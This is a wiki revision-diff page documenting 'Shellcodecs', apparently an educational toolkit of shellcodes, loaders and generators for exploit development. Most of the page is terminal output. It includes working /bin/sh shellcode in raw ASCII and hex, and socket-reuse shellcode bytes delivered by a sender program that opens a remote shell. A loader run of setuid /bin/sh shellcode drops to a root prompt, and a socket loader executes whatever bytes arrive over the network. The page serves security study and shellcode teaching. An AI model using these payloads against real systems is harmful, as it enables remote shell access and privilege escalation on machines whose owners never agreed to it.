Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Shellcodecs"

From NetSec
Jump to: navigation, search
(Generators)
(Loaders)
 
(11 intermediate revisions by 2 users not shown)
Line 89: Line 89:
 
==Generators==
 
==Generators==
  
Demonstration of using the shellcode generator to assemble shellcode and output the byte code:
+
The shellcode generator [[assembly|assembles]] [[shellcode]] from its assembly file (or a binary) and outputs the byte code as raw ascii, a [[hexadecimal]] representation, or as a [[C]] variable. It can also optionally output the length of the shellcode. The raw ascii representation can be piped into a generator or exploit (or a [[binary]] file), whereas the hexadecimal representation can be used in exploit code.
  
  [user@localhost shellcode]$ generators/shellcode-generator.py --file=ascii-shellcode/ascii_binsh --raw
+
* Help
  XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00
+
  [user@localhost shellcode]$ generators/shellcode-generator.py --file=ascii-shellcode/ascii_binsh --hex
+
  \x58\x54\x58\x34\x65\x34\x75\x48\x31\x30\x48\x33\x30\x56\x59\x68\x4a\x47\x30\x30\x58\x31\x41\x64\x54\x59\x58
+
  \x48\x63\x71\x30\x31\x71\x30\x48\x63\x71\x34\x31\x71\x34\x48\x63\x79\x30\x48\x63\x71\x30\x57\x5a\x68\x5a\x55
+
  \x58\x5a\x58\x35\x75\x37\x31\x34\x31\x41\x30\x68\x5a\x47\x51\x6a\x58\x35\x75\x34\x39\x6a\x31\x41\x34\x48\x33
+
  \x79\x30\x58\x57\x6a\x58\x48\x63\x39\x48\x33\x39\x58\x54\x48\x33\x39\x34\x63\x45\x42\x30\x30
+
  [user@localhost shellcode]$ generators/shellcode-generator.py --file=ascii-shellcode/ascii_binsh --var
+
  char shellcode[] = {
+
    "\x58\x54\x58\x34\x65\x34\x75\x48\x31\x30\x48\x33\x30\x56\x59\x68"
+
    "\x4a\x47\x30\x30\x58\x31\x41\x64\x54\x59\x58\x48\x63\x71\x30\x31"
+
    "\x71\x30\x48\x63\x71\x34\x31\x71\x34\x48\x63\x79\x30\x48\x63\x71"
+
    "\x30\x57\x5a\x68\x5a\x55\x58\x5a\x58\x35\x75\x37\x31\x34\x31\x41"
+
    "\x30\x68\x5a\x47\x51\x6a\x58\x35\x75\x34\x39\x6a\x31\x41\x34\x48"
+
    "\x33\x79\x30\x58\x57\x6a\x58\x48\x63\x39\x48\x33\x39\x58\x54\x48"
+
    "\x33\x39\x34\x63\x45\x42\x30\x30"
+
  };
+
  [user@localhost shellcode]$ generators/shellcode-generator.py --file=ascii-shellcode/ascii_binsh --var --len
+
  char shellcode[] = {
+
    "\x58\x54\x58\x34\x65\x34\x75\x48\x31\x30\x48\x33\x30\x56\x59\x68"
+
    "\x4a\x47\x30\x30\x58\x31\x41\x64\x54\x59\x58\x48\x63\x71\x30\x31"
+
    "\x71\x30\x48\x63\x71\x34\x31\x71\x34\x48\x63\x79\x30\x48\x63\x71"
+
    "\x30\x57\x5a\x68\x5a\x55\x58\x5a\x58\x35\x75\x37\x31\x34\x31\x41"
+
    "\x30\x68\x5a\x47\x51\x6a\x58\x35\x75\x34\x39\x6a\x31\x41\x34\x48"
+
    "\x33\x79\x30\x58\x57\x6a\x58\x48\x63\x39\x48\x33\x39\x58\x54\x48"
+
    "\x33\x39\x34\x63\x45\x42\x30\x30"
+
  };
+
  Length: 104 bytes
+
  [user@localhost shellcode]$
+
  
Demonstration of the socket-reuse generator:
+
{{LinuxCMD|generators/shellcode-generator.py --help
 +
usage: shellcode-generator.py [-h] --file FILE [--hex] [--raw] [--var] [--len]
  
   [user@localhost shellcode]$ generators/socket-reuse-generator.py  
+
optional arguments:
  Usage: generators/socket-reuse-generator.py <source IP> <source port>
+
 
  [user@localhost shellcode]$ generators/socket-reuse-generator.py 127.0.0.1 1234
+
-h, --help   show this help message and exit
  "\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6"
+
 
  "\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62"
+
--file FILE
  "\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b"
+
 
  "\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66"
+
--hex        Output in hex format (\x0f\x05)
  "\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21"
+
 
  "\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48"
+
--raw        Output in raw format
  "\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f"
+
 
  "\x6a\x3b\x58\x0f\x05"
+
--var        Output as a variable
  [user@localhost shellcode]$ vim socket-reuse/socket-reuse
+
 
  [user@localhost shellcode]$ vim socket-reuse/socket-reuse-send.c
+
--len        Output the length
  [user@localhost shellcode]$ gcc -o socket-reuse/socket-reuse-send socket-reuse/socket-reuse-send.c  
+
}}
  [user@localhost shellcode]$ socket-reuse/socket-reuse-send 127.0.0.1 1235 127.0.0.1 1234 # <target IP> <target port> <source IP> <source port>
+
 
  Connecting to 127.0.0.1
+
<br />
  Sending payload
+
 
  ls
+
 
  Makefile
+
* An example of using the generator to output raw ascii follows:
  ascii-shellcode
+
 
  dynamic
+
{{LinuxCMD|generators/shellcode-generator.py --file&#x3d;ascii-shellcode/ascii_binsh --raw
  environment
+
XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00}}
  generators
+
 
  loaders
+
 
  null-free
+
 
  parsing
+
The [[Shellcode/Socket-reuse|socket reuse]] generator accepts the source IP and source port that the socket reuse [[shellcode]] will be sent from and outputs the [[hexadecimal]] representation of the code to input into the [[Shellcode/Appendix#socket-reuse-send.c|socket-reuse-send.c]] source file.
  self-modifying
+
 
  socket-reuse
+
<pre>
  exit
+
[user@localhost shellcode]$ generators/socket-reuse-generator.py  
  ^C
+
Usage: generators/socket-reuse-generator.py <source IP> <source port>
  [user@localhost shellcode]$
+
[user@localhost shellcode]$ generators/socket-reuse-generator.py 127.0.0.1 1234
 +
"\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6"
 +
"\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62"
 +
"\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b"
 +
"\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66"
 +
"\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21"
 +
"\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48"
 +
"\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f"
 +
"\x6a\x3b\x58\x0f\x05"
 +
[user@localhost shellcode]$ gcc -o socket-reuse/socket-reuse-send socket-reuse/socket-reuse-send.c  
 +
[user@localhost shellcode]$
 +
</pre>
  
 
==Loaders==
 
==Loaders==
  
  [user@localhost shellcode]$ loaders/loader-64 $(generators/shellcode-generator.py --file=null-free/setuid_binsh.s --raw)
+
The standard loader accepts shellcode as a command line argument (argv[1]) and executes it. This can be combined with the shellcode generator to test code:
  [root@localhost shellcode]# exit
+
 
  exit
+
{{LinuxCMD|loaders/loader-64 $(generators/shellcode-generator.py --file&#x3d;null-free/setuid_binsh.s --raw)
  [user@localhost shellcode]$
+
[root@localhost shellcode]# exit
 +
exit}}
 +
 
 +
 
 +
The socket loader runs any input off of the socket as it is received to test socket-based code (such as the socket-reuse code). It accepts a port number as an argument. Warning: this code listens on all ports, so only use it on a closed network.
 +
 
 +
{{LinuxCMD|loaders/socket-loader 1235
 +
[*] Received 117 bytes, executing.
 +
}
  
 
=Getting help=
 
=Getting help=

Latest revision as of 23:20, 25 May 2013

Shellcodecs is a collection of shellcodes, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process.

Dependencies

In order to run these shellcodes, the following dependencies are required:

Unless otherwise noted, code is amd64. There are various 32-bit examples as well. If you think you may have an out of date version, or that the official version is out-of-sync with the site, the latest sources will be available 100% of the time in the shellcode appendix.

Contents

Loaders



Tools



Payloads



Stubs


Building the code

  • tar xzvf shellcode.tgz
  • cd shellcode
  • make

It is also possible to make exclusively x86 or x64 binaries using make x86 or make x64. Please keep in mind, there is more support for 64-bit in this package than 32-bit.

Using the tools

Generators

The shellcode generator assembles shellcode from its assembly file (or a binary) and outputs the byte code as raw ascii, a hexadecimal representation, or as a C variable. It can also optionally output the length of the shellcode. The raw ascii representation can be piped into a generator or exploit (or a binary file), whereas the hexadecimal representation can be used in exploit code.

  • Help
Terminal

localhost:~ $ generators/shellcode-generator.py --help

usage: shellcode-generator.py [-h] --file FILE [--hex] [--raw] [--var] [--len]

optional arguments:

-h, --help show this help message and exit

--file FILE

--hex Output in hex format (\x0f\x05)

--raw Output in raw format

--var Output as a variable

--len Output the length




  • An example of using the generator to output raw ascii follows:
Terminal

localhost:~ $ generators/shellcode-generator.py --file=ascii-shellcode/ascii_binsh --raw XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00


The socket reuse generator accepts the source IP and source port that the socket reuse shellcode will be sent from and outputs the hexadecimal representation of the code to input into the socket-reuse-send.c source file.

[user@localhost shellcode]$ generators/socket-reuse-generator.py 
Usage: generators/socket-reuse-generator.py <source IP> <source port>
[user@localhost shellcode]$ generators/socket-reuse-generator.py 127.0.0.1 1234
"\xeb\x05\x6a\x3c\x58\x0f\x05\x6a\x02\x5f\x48\x8d\x54\x24\xec\xc6"
"\x02\x10\x48\x8d\x72\x04\xff\xc7\x66\x85\xff\x74\xe5\x48\x8d\x62"
"\x14\x48\x83\xec\x20\x6a\x34\x58\x0f\x05\x84\xc0\x75\xe8\x6a\x1b"
"\x59\xbb\x80\xff\xff\xfe\xf7\xd3\x39\x1c\x8c\x75\xd9\xb1\x35\x66"
"\xbb\xfb\x2d\x66\xf7\xd3\x66\x39\x1c\x4c\x75\xca\x50\x5e\x6a\x21"
"\x58\x0f\x05\xff\xc6\x83\xfe\x04\x75\xf4\x5f\x57\x57\x5e\x5a\x48"
"\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f"
"\x6a\x3b\x58\x0f\x05"
[user@localhost shellcode]$ gcc -o socket-reuse/socket-reuse-send socket-reuse/socket-reuse-send.c 
[user@localhost shellcode]$

Loaders

The standard loader accepts shellcode as a command line argument (argv[1]) and executes it. This can be combined with the shellcode generator to test code:

Terminal

localhost:~ $ loaders/loader-64 $(generators/shellcode-generator.py --file=null-free/setuid_binsh.s --raw)

[root@localhost shellcode]# exit

exit


The socket loader runs any input off of the socket as it is received to test socket-based code (such as the socket-reuse code). It accepts a port number as an argument. Warning: this code listens on all ports, so only use it on a closed network.

{{LinuxCMD|loaders/socket-loader 1235

[*] Received 117 bytes, executing.

}

Getting help

RPU0j.png
We are not free technical support and reserve the right to revoke support to anyone for any reason at any time.

If you're using the tools and there's a problem, try re-reading the documentation before asking a question. If you're absolutely sure it is programmatical error and not user error preventing the code from working properly, you can let us know by talking on the shellcode talk page.

Credits

Shellcodecs is part of a series on programming.
<center>
</center>